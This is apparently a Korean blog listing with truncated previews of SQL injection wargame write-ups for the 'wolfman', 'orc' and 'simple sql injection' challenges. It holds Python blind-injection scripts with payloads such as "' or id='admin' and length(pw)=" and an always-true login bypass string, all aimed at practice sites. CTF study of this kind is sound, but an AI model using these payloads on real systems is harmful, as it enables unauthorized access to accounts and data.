import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "?pw=ABCD'%09or%09id='admin'%09and%09length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, verify=Fal..
휴가 나가고 싶다 보고싶어 미치겠다 import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "pw=ABCD' or id='admin' and length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, ver..
이번에는 이름부터 간단한 simple sql injection 문제이다. 바로 코드로 넘어가보자. 자세히 보아야 할 부분만 가져왔다. 로그인에 성공한 이후 userid가 admin이면 flag를 출력한다. admin이 아닌 계정으로 로그인하면 간단한 인사만을 alert한다. 다른 필터링이 없다. 바로 SQL Injection을 진행하면 될 것 같다. 필터링이 없는 victim에 SQL Injection 공격의 정답은 해가 무수히 많은 고차방정식과 같다. sql문에서 where 뒷부분만을 'True'로 만들어주기만 하면 된다. 하지만 password 영역에 or 연산을 삽입(userid=admin, password=1" or "1"="1)시키는 것은, 왜인지는 모르겠지만, hello guest 라고 ale..
